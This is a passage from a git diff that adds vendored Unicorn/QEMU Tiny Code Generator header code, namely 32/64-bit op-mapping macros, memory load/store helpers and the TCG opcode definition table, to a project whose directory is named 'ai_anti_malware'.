*/ + tcg_gen_sari_i64(s, t2, arg1, 63); + tcg_gen_sari_i64(s, t3, arg2, 63); + tcg_gen_and_i64(s, t2, t2, arg2); + tcg_gen_and_i64(s, t3, t3, arg1); + tcg_gen_sub_i64(s, rh, t1, t2); + tcg_gen_sub_i64(s, rh, rh, t3); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + tcg_temp_free_i64(s, t1); + tcg_temp_free_i64(s, t2); + tcg_temp_free_i64(s, t3); + } else { + TCGv_i64 t0 = tcg_temp_new_i64(s); + tcg_gen_mul_i64(s, t0, arg1, arg2); + gen_helper_mulsh_i64(s, rh, arg1, arg2); + tcg_gen_mov_i64(s, rl, t0); + tcg_temp_free_i64(s, t0); + } +} + +/***************************************/ +/* QEMU specific operations. Their type depend on the QEMU CPU + type. */ +#ifndef TARGET_LONG_BITS +#error must include QEMU headers +#endif + +#if TARGET_LONG_BITS == 32 +#define TCGv TCGv_i32 +#define tcg_temp_new(s) tcg_temp_new_i32(s) +#define tcg_global_reg_new tcg_global_reg_new_i32 +#define tcg_global_mem_new tcg_global_mem_new_i32 +#define tcg_temp_local_new(s) tcg_temp_local_new_i32(s) +#define tcg_temp_free tcg_temp_free_i32 +#define TCGV_UNUSED(x) TCGV_UNUSED_I32(x) +#define TCGV_IS_UNUSED(x) TCGV_IS_UNUSED_I32(x) +#define TCGV_EQUAL(a, b) TCGV_EQUAL_I32(a, b) +#define tcg_add_param_tl tcg_add_param_i32 +#define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i32 +#define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i32 +#else +#define TCGv TCGv_i64 +#define tcg_temp_new(s) tcg_temp_new_i64(s) +#define tcg_global_reg_new tcg_global_reg_new_i64 +#define tcg_global_mem_new tcg_global_mem_new_i64 +#define tcg_temp_local_new(s) tcg_temp_local_new_i64(s) +#define tcg_temp_free tcg_temp_free_i64 +#define TCGV_UNUSED(x) TCGV_UNUSED_I64(x) +#define TCGV_IS_UNUSED(x) TCGV_IS_UNUSED_I64(x) +#define TCGV_EQUAL(a, b) TCGV_EQUAL_I64(a, b) +#define tcg_add_param_tl tcg_add_param_i64 +#define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i64 +#define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i64 +#endif + +/* debug info: write the PC of the corresponding QEMU CPU instruction */ +static inline void 
tcg_gen_debug_insn_start(TCGContext *s, uint64_t pc) +{ + /* XXX: must really use a 32 bit size for TCGArg in all cases */ +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS + tcg_gen_op2ii(s, INDEX_op_debug_insn_start, + (uint32_t)(pc), (uint32_t)(pc >> 32)); +#else + tcg_gen_op1i(s, INDEX_op_debug_insn_start, pc); +#endif +} + +static inline void tcg_gen_exit_tb(TCGContext *s, uintptr_t val) +{ + tcg_gen_op1i(s, INDEX_op_exit_tb, val); +} + +static inline void tcg_gen_goto_tb(TCGContext *s, unsigned idx) +{ + /* We only support two chained exits. */ + tcg_debug_assert(idx <= 1); +#ifdef CONFIG_DEBUG_TCG + /* Verify that we havn't seen this numbered exit before. */ + tcg_debug_assert((s->goto_tb_issue_mask & (1 << idx)) == 0); + s->goto_tb_issue_mask |= 1 << idx; +#endif + tcg_gen_op1i(s, INDEX_op_goto_tb, idx); +} + + +void tcg_gen_qemu_ld_i32(struct uc_struct *uc, TCGv_i32, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_st_i32(struct uc_struct *uc, TCGv_i32, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_ld_i64(struct uc_struct *uc, TCGv_i64, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_st_i64(struct uc_struct *uc, TCGv_i64, TCGv, TCGArg, TCGMemOp); + +static inline void tcg_gen_qemu_ld8u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_UB); +} + +static inline void tcg_gen_qemu_ld8s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_SB); +} + +static inline void tcg_gen_qemu_ld16u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TEUW); +} + +static inline void tcg_gen_qemu_ld16s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TESW); +} + +static inline void tcg_gen_qemu_ld32u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TEUL); +} + +static inline void 
tcg_gen_qemu_ld32s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TESL); +} + +static inline void tcg_gen_qemu_ld64(struct uc_struct *uc, TCGv_i64 ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_i64(uc, ret, addr, mem_index, MO_TEQ); +} + +static inline void tcg_gen_qemu_st8(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_UB); +} + +static inline void tcg_gen_qemu_st16(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_TEUW); +} + +static inline void tcg_gen_qemu_st32(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_TEUL); +} + +static inline void tcg_gen_qemu_st64(struct uc_struct *uc, TCGv_i64 arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_i64(uc, arg, addr, mem_index, MO_TEQ); +} + +#if TARGET_LONG_BITS == 64 +#define tcg_gen_movi_tl tcg_gen_movi_i64 +#define tcg_gen_mov_tl tcg_gen_mov_i64 +#define tcg_gen_ld8u_tl tcg_gen_ld8u_i64 +#define tcg_gen_ld8s_tl tcg_gen_ld8s_i64 +#define tcg_gen_ld16u_tl tcg_gen_ld16u_i64 +#define tcg_gen_ld16s_tl tcg_gen_ld16s_i64 +#define tcg_gen_ld32u_tl tcg_gen_ld32u_i64 +#define tcg_gen_ld32s_tl tcg_gen_ld32s_i64 +#define tcg_gen_ld_tl tcg_gen_ld_i64 +#define tcg_gen_st8_tl tcg_gen_st8_i64 +#define tcg_gen_st16_tl tcg_gen_st16_i64 +#define tcg_gen_st32_tl tcg_gen_st32_i64 +#define tcg_gen_st_tl tcg_gen_st_i64 +#define tcg_gen_add_tl tcg_gen_add_i64 +#define tcg_gen_addi_tl tcg_gen_addi_i64 +#define tcg_gen_sub_tl tcg_gen_sub_i64 +#define tcg_gen_neg_tl tcg_gen_neg_i64 +#define tcg_gen_subfi_tl tcg_gen_subfi_i64 +#define tcg_gen_subi_tl tcg_gen_subi_i64 +#define tcg_gen_and_tl tcg_gen_and_i64 +#define tcg_gen_andi_tl tcg_gen_andi_i64 +#define tcg_gen_or_tl tcg_gen_or_i64 +#define tcg_gen_ori_tl tcg_gen_ori_i64 +#define tcg_gen_xor_tl tcg_gen_xor_i64 +#define tcg_gen_xori_tl 
tcg_gen_xori_i64 +#define tcg_gen_not_tl tcg_gen_not_i64 +#define tcg_gen_shl_tl tcg_gen_shl_i64 +#define tcg_gen_shli_tl tcg_gen_shli_i64 +#define tcg_gen_shr_tl tcg_gen_shr_i64 +#define tcg_gen_shri_tl tcg_gen_shri_i64 +#define tcg_gen_sar_tl tcg_gen_sar_i64 +#define tcg_gen_sari_tl tcg_gen_sari_i64 +#define tcg_gen_brcond_tl tcg_gen_brcond_i64 +#define tcg_gen_brcondi_tl tcg_gen_brcondi_i64 +#define tcg_gen_setcond_tl tcg_gen_setcond_i64 +#define tcg_gen_setcondi_tl tcg_gen_setcondi_i64 +#define tcg_gen_mul_tl tcg_gen_mul_i64 +#define tcg_gen_muli_tl tcg_gen_muli_i64 +#define tcg_gen_div_tl tcg_gen_div_i64 +#define tcg_gen_rem_tl tcg_gen_rem_i64 +#define tcg_gen_divu_tl tcg_gen_divu_i64 +#define tcg_gen_remu_tl tcg_gen_remu_i64 +#define tcg_gen_discard_tl tcg_gen_discard_i64 +#define tcg_gen_trunc_tl_i32 tcg_gen_trunc_i64_i32 +#define tcg_gen_trunc_i64_tl tcg_gen_mov_i64 +#define tcg_gen_extu_i32_tl tcg_gen_extu_i32_i64 +#define tcg_gen_ext_i32_tl tcg_gen_ext_i32_i64 +#define tcg_gen_extu_tl_i64 tcg_gen_mov_i64 +#define tcg_gen_ext_tl_i64 tcg_gen_mov_i64 +#define tcg_gen_ext8u_tl tcg_gen_ext8u_i64 +#define tcg_gen_ext8s_tl tcg_gen_ext8s_i64 +#define tcg_gen_ext16u_tl tcg_gen_ext16u_i64 +#define tcg_gen_ext16s_tl tcg_gen_ext16s_i64 +#define tcg_gen_ext32u_tl tcg_gen_ext32u_i64 +#define tcg_gen_ext32s_tl tcg_gen_ext32s_i64 +#define tcg_gen_bswap16_tl tcg_gen_bswap16_i64 +#define tcg_gen_bswap32_tl tcg_gen_bswap32_i64 +#define tcg_gen_bswap64_tl tcg_gen_bswap64_i64 +#define tcg_gen_concat_tl_i64 tcg_gen_concat32_i64 +#define tcg_gen_extr_i64_tl tcg_gen_extr32_i64 +#define tcg_gen_andc_tl tcg_gen_andc_i64 +#define tcg_gen_eqv_tl tcg_gen_eqv_i64 +#define tcg_gen_nand_tl tcg_gen_nand_i64 +#define tcg_gen_nor_tl tcg_gen_nor_i64 +#define tcg_gen_orc_tl tcg_gen_orc_i64 +#define tcg_gen_rotl_tl tcg_gen_rotl_i64 +#define tcg_gen_rotli_tl tcg_gen_rotli_i64 +#define tcg_gen_rotr_tl tcg_gen_rotr_i64 +#define tcg_gen_rotri_tl tcg_gen_rotri_i64 +#define tcg_gen_deposit_tl 
tcg_gen_deposit_i64 +#define tcg_const_tl tcg_const_i64 +#define tcg_const_local_tl tcg_const_local_i64 +#define tcg_gen_movcond_tl tcg_gen_movcond_i64 +#define tcg_gen_add2_tl tcg_gen_add2_i64 +#define tcg_gen_sub2_tl tcg_gen_sub2_i64 +#define tcg_gen_mulu2_tl tcg_gen_mulu2_i64 +#define tcg_gen_muls2_tl tcg_gen_muls2_i64 +#else +#define tcg_gen_movi_tl tcg_gen_movi_i32 +#define tcg_gen_mov_tl tcg_gen_mov_i32 +#define tcg_gen_ld8u_tl tcg_gen_ld8u_i32 +#define tcg_gen_ld8s_tl tcg_gen_ld8s_i32 +#define tcg_gen_ld16u_tl tcg_gen_ld16u_i32 +#define tcg_gen_ld16s_tl tcg_gen_ld16s_i32 +#define tcg_gen_ld32u_tl tcg_gen_ld_i32 +#define tcg_gen_ld32s_tl tcg_gen_ld_i32 +#define tcg_gen_ld_tl tcg_gen_ld_i32 +#define tcg_gen_st8_tl tcg_gen_st8_i32 +#define tcg_gen_st16_tl tcg_gen_st16_i32 +#define tcg_gen_st32_tl tcg_gen_st_i32 +#define tcg_gen_st_tl tcg_gen_st_i32 +#define tcg_gen_add_tl tcg_gen_add_i32 +#define tcg_gen_addi_tl tcg_gen_addi_i32 +#define tcg_gen_sub_tl tcg_gen_sub_i32 +#define tcg_gen_neg_tl tcg_gen_neg_i32 +#define tcg_gen_subfi_tl tcg_gen_subfi_i32 +#define tcg_gen_subi_tl tcg_gen_subi_i32 +#define tcg_gen_and_tl tcg_gen_and_i32 +#define tcg_gen_andi_tl tcg_gen_andi_i32 +#define tcg_gen_or_tl tcg_gen_or_i32 +#define tcg_gen_ori_tl tcg_gen_ori_i32 +#define tcg_gen_xor_tl tcg_gen_xor_i32 +#define tcg_gen_xori_tl tcg_gen_xori_i32 +#define tcg_gen_not_tl tcg_gen_not_i32 +#define tcg_gen_shl_tl tcg_gen_shl_i32 +#define tcg_gen_shli_tl tcg_gen_shli_i32 +#define tcg_gen_shr_tl tcg_gen_shr_i32 +#define tcg_gen_shri_tl tcg_gen_shri_i32 +#define tcg_gen_sar_tl tcg_gen_sar_i32 +#define tcg_gen_sari_tl tcg_gen_sari_i32 +#define tcg_gen_brcond_tl tcg_gen_brcond_i32 +#define tcg_gen_brcondi_tl tcg_gen_brcondi_i32 +#define tcg_gen_setcond_tl tcg_gen_setcond_i32 +#define tcg_gen_setcondi_tl tcg_gen_setcondi_i32 +#define tcg_gen_mul_tl tcg_gen_mul_i32 +#define tcg_gen_muli_tl tcg_gen_muli_i32 +#define tcg_gen_div_tl tcg_gen_div_i32 +#define tcg_gen_rem_tl tcg_gen_rem_i32 
+#define tcg_gen_divu_tl tcg_gen_divu_i32 +#define tcg_gen_remu_tl tcg_gen_remu_i32 +#define tcg_gen_discard_tl tcg_gen_discard_i32 +#define tcg_gen_trunc_tl_i32 tcg_gen_mov_i32 +#define tcg_gen_trunc_i64_tl tcg_gen_trunc_i64_i32 +#define tcg_gen_extu_i32_tl tcg_gen_mov_i32 +#define tcg_gen_ext_i32_tl tcg_gen_mov_i32 +#define tcg_gen_extu_tl_i64 tcg_gen_extu_i32_i64 +#define tcg_gen_ext_tl_i64 tcg_gen_ext_i32_i64 +#define tcg_gen_ext8u_tl tcg_gen_ext8u_i32 +#define tcg_gen_ext8s_tl tcg_gen_ext8s_i32 +#define tcg_gen_ext16u_tl tcg_gen_ext16u_i32 +#define tcg_gen_ext16s_tl tcg_gen_ext16s_i32 +#define tcg_gen_ext32u_tl tcg_gen_mov_i32 +#define tcg_gen_ext32s_tl tcg_gen_mov_i32 +#define tcg_gen_bswap16_tl tcg_gen_bswap16_i32 +#define tcg_gen_bswap32_tl tcg_gen_bswap32_i32 +#define tcg_gen_concat_tl_i64 tcg_gen_concat_i32_i64 +#define tcg_gen_extr_i64_tl tcg_gen_extr_i64_i32 +#define tcg_gen_andc_tl tcg_gen_andc_i32 +#define tcg_gen_eqv_tl tcg_gen_eqv_i32 +#define tcg_gen_nand_tl tcg_gen_nand_i32 +#define tcg_gen_nor_tl tcg_gen_nor_i32 +#define tcg_gen_orc_tl tcg_gen_orc_i32 +#define tcg_gen_rotl_tl tcg_gen_rotl_i32 +#define tcg_gen_rotli_tl tcg_gen_rotli_i32 +#define tcg_gen_rotr_tl tcg_gen_rotr_i32 +#define tcg_gen_rotri_tl tcg_gen_rotri_i32 +#define tcg_gen_deposit_tl tcg_gen_deposit_i32 +#define tcg_const_tl tcg_const_i32 +#define tcg_const_local_tl tcg_const_local_i32 +#define tcg_gen_movcond_tl tcg_gen_movcond_i32 +#define tcg_gen_add2_tl tcg_gen_add2_i32 +#define tcg_gen_sub2_tl tcg_gen_sub2_i32 +#define tcg_gen_mulu2_tl tcg_gen_mulu2_i32 +#define tcg_gen_muls2_tl tcg_gen_muls2_i32 +#endif + +#if UINTPTR_MAX == UINT32_MAX +# define tcg_gen_ld_ptr(S, R, A, O) \ + tcg_gen_ld_i32(S, TCGV_PTR_TO_NAT(R), (A), (O)) +# define tcg_gen_discard_ptr(A) \ + tcg_gen_discard_i32(TCGV_PTR_TO_NAT(A)) +# define tcg_gen_add_ptr(S, R, A, B) \ + tcg_gen_add_i32(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), TCGV_PTR_TO_NAT(B)) +# define tcg_gen_addi_ptr(S, R, A, B) \ + 
tcg_gen_addi_i32(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), (B)) +# define tcg_gen_ext_i32_ptr(S, R, A) \ + tcg_gen_mov_i32(S, TCGV_PTR_TO_NAT(R), (A)) +#else +# define tcg_gen_ld_ptr(S, R, A, O) \ + tcg_gen_ld_i64(S, TCGV_PTR_TO_NAT(R), (A), (O)) +# define tcg_gen_discard_ptr(A) \ + tcg_gen_discard_i64(TCGV_PTR_TO_NAT(A)) +# define tcg_gen_add_ptr(S, R, A, B) \ + tcg_gen_add_i64(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), TCGV_PTR_TO_NAT(B)) +# define tcg_gen_addi_ptr(S, R, A, B) \ + tcg_gen_addi_i64(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), (B)) +# define tcg_gen_ext_i32_ptr(S, R, A) \ + tcg_gen_ext_i32_i64(S, TCGV_PTR_TO_NAT(R), (A)) +#endif /* UINTPTR_MAX == UINT32_MAX */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h new file mode 100644 index 0000000..9df65bc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h @@ -0,0 +1,209 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* + * DEF(name, oargs, iargs, cargs, flags) + */ + +/* predefined ops */ +DEF(end, 0, 0, 0, TCG_OPF_NOT_PRESENT) /* must be kept first */ +DEF(nop, 0, 0, 0, TCG_OPF_NOT_PRESENT) +DEF(nop1, 0, 0, 1, TCG_OPF_NOT_PRESENT) +DEF(nop2, 0, 0, 2, TCG_OPF_NOT_PRESENT) +DEF(nop3, 0, 0, 3, TCG_OPF_NOT_PRESENT) + +/* variable number of parameters */ +DEF(nopn, 0, 0, 1, TCG_OPF_NOT_PRESENT) + +DEF(discard, 1, 0, 0, TCG_OPF_NOT_PRESENT) +DEF(set_label, 0, 0, 1, TCG_OPF_BB_END | TCG_OPF_NOT_PRESENT) + +/* variable number of parameters */ +DEF(call, 0, 0, 3, TCG_OPF_CALL_CLOBBER | TCG_OPF_NOT_PRESENT) + +DEF(br, 0, 0, 1, TCG_OPF_BB_END) + +#ifdef _MSC_VER +#define IMPL(X) ((0 && !(X)) ? TCG_OPF_NOT_PRESENT : 0) +#else +#define IMPL(X) (__builtin_constant_p(X) && !(X) ? 
TCG_OPF_NOT_PRESENT : 0) +#endif + +#if TCG_TARGET_REG_BITS == 32 +# define IMPL64 TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT +#else +# define IMPL64 TCG_OPF_64BIT +#endif + +DEF(mov_i32, 1, 1, 0, TCG_OPF_NOT_PRESENT) +DEF(movi_i32, 1, 0, 1, TCG_OPF_NOT_PRESENT) +DEF(setcond_i32, 1, 2, 1, 0) +DEF(movcond_i32, 1, 4, 1, IMPL(TCG_TARGET_HAS_movcond_i32)) +/* load/store */ +DEF(ld8u_i32, 1, 1, 1, 0) +DEF(ld8s_i32, 1, 1, 1, 0) +DEF(ld16u_i32, 1, 1, 1, 0) +DEF(ld16s_i32, 1, 1, 1, 0) +DEF(ld_i32, 1, 1, 1, 0) +DEF(st8_i32, 0, 2, 1, 0) +DEF(st16_i32, 0, 2, 1, 0) +DEF(st_i32, 0, 2, 1, 0) +/* arith */ +DEF(add_i32, 1, 2, 0, 0) +DEF(sub_i32, 1, 2, 0, 0) +DEF(mul_i32, 1, 2, 0, 0) +DEF(div_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) +DEF(divu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) +DEF(rem_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) +DEF(remu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) +DEF(div2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) +DEF(divu2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) +DEF(and_i32, 1, 2, 0, 0) +DEF(or_i32, 1, 2, 0, 0) +DEF(xor_i32, 1, 2, 0, 0) +/* shifts/rotates */ +DEF(shl_i32, 1, 2, 0, 0) +DEF(shr_i32, 1, 2, 0, 0) +DEF(sar_i32, 1, 2, 0, 0) +DEF(rotl_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) +DEF(rotr_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) +DEF(deposit_i32, 1, 2, 2, IMPL(TCG_TARGET_HAS_deposit_i32)) + +DEF(brcond_i32, 0, 2, 2, TCG_OPF_BB_END) + +DEF(add2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_add2_i32)) +DEF(sub2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_sub2_i32)) +DEF(mulu2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_mulu2_i32)) +DEF(muls2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_muls2_i32)) +DEF(muluh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i32)) +DEF(mulsh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i32)) +DEF(brcond2_i32, 0, 4, 2, TCG_OPF_BB_END | IMPL(TCG_TARGET_REG_BITS == 32)) +DEF(setcond2_i32, 1, 4, 1, IMPL(TCG_TARGET_REG_BITS == 32)) + +DEF(ext8s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8s_i32)) +DEF(ext16s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16s_i32)) +DEF(ext8u_i32, 1, 
1, 0, IMPL(TCG_TARGET_HAS_ext8u_i32)) +DEF(ext16u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16u_i32)) +DEF(bswap16_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap16_i32)) +DEF(bswap32_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap32_i32)) +DEF(not_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_not_i32)) +DEF(neg_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_neg_i32)) +DEF(andc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_andc_i32)) +DEF(orc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_orc_i32)) +DEF(eqv_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_eqv_i32)) +DEF(nand_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nand_i32)) +DEF(nor_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nor_i32)) + +DEF(mov_i64, 1, 1, 0, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) +DEF(movi_i64, 1, 0, 1, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) +DEF(setcond_i64, 1, 2, 1, IMPL64) +DEF(movcond_i64, 1, 4, 1, IMPL64 | IMPL(TCG_TARGET_HAS_movcond_i64)) +/* load/store */ +DEF(ld8u_i64, 1, 1, 1, IMPL64) +DEF(ld8s_i64, 1, 1, 1, IMPL64) +DEF(ld16u_i64, 1, 1, 1, IMPL64) +DEF(ld16s_i64, 1, 1, 1, IMPL64) +DEF(ld32u_i64, 1, 1, 1, IMPL64) +DEF(ld32s_i64, 1, 1, 1, IMPL64) +DEF(ld_i64, 1, 1, 1, IMPL64) +DEF(st8_i64, 0, 2, 1, IMPL64) +DEF(st16_i64, 0, 2, 1, IMPL64) +DEF(st32_i64, 0, 2, 1, IMPL64) +DEF(st_i64, 0, 2, 1, IMPL64) +/* arith */ +DEF(add_i64, 1, 2, 0, IMPL64) +DEF(sub_i64, 1, 2, 0, IMPL64) +DEF(mul_i64, 1, 2, 0, IMPL64) +DEF(div_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) +DEF(divu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) +DEF(rem_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) +DEF(remu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) +DEF(div2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) +DEF(divu2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) +DEF(and_i64, 1, 2, 0, IMPL64) +DEF(or_i64, 1, 2, 0, IMPL64) +DEF(xor_i64, 1, 2, 0, IMPL64) +/* shifts/rotates */ +DEF(shl_i64, 1, 2, 0, IMPL64) +DEF(shr_i64, 1, 2, 0, IMPL64) +DEF(sar_i64, 1, 2, 0, IMPL64) +DEF(rotl_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) +DEF(rotr_i64, 1, 2, 0, IMPL64 | 
IMPL(TCG_TARGET_HAS_rot_i64)) +DEF(deposit_i64, 1, 2, 2, IMPL64 | IMPL(TCG_TARGET_HAS_deposit_i64)) + +DEF(trunc_shr_i32, 1, 1, 1, + IMPL(TCG_TARGET_HAS_trunc_shr_i32) + | (TCG_TARGET_REG_BITS == 32 ? TCG_OPF_NOT_PRESENT : 0)) + +DEF(brcond_i64, 0, 2, 2, TCG_OPF_BB_END | IMPL64) +DEF(ext8s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8s_i64)) +DEF(ext16s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16s_i64)) +DEF(ext32s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32s_i64)) +DEF(ext8u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8u_i64)) +DEF(ext16u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16u_i64)) +DEF(ext32u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32u_i64)) +DEF(bswap16_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap16_i64)) +DEF(bswap32_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap32_i64)) +DEF(bswap64_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap64_i64)) +DEF(not_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_not_i64)) +DEF(neg_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_neg_i64)) +DEF(andc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_andc_i64)) +DEF(orc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_orc_i64)) +DEF(eqv_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_eqv_i64)) +DEF(nand_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nand_i64)) +DEF(nor_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nor_i64)) + +DEF(add2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_add2_i64)) +DEF(sub2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_sub2_i64)) +DEF(mulu2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulu2_i64)) +DEF(muls2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muls2_i64)) +DEF(muluh_i64, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i64)) +DEF(mulsh_i64, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i64)) + +/* QEMU specific */ +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS +DEF(debug_insn_start, 0, 0, 2, TCG_OPF_NOT_PRESENT) +#else +DEF(debug_insn_start, 0, 0, 1, TCG_OPF_NOT_PRESENT) +#endif +DEF(exit_tb, 0, 0, 1, TCG_OPF_BB_END) +DEF(goto_tb, 0, 0, 1, TCG_OPF_BB_END) + +#define TLADDR_ARGS 
(TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? 1 : 2) +#define DATA64_ARGS (TCG_TARGET_REG_BITS == 64 ? 1 : 2) + +DEF(qemu_ld_i32, 1, TLADDR_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) +DEF(qemu_st_i32, 0, TLADDR_ARGS + 1, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) +DEF(qemu_ld_i64, DATA64_ARGS, TLADDR_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) +DEF(qemu_st_i64, 0, TLADDR_ARGS + DATA64_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) + +#undef TLADDR_ARGS +#undef DATA64_ARGS +#undef IMPL +#undef IMPL64 +#undef DEF diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h 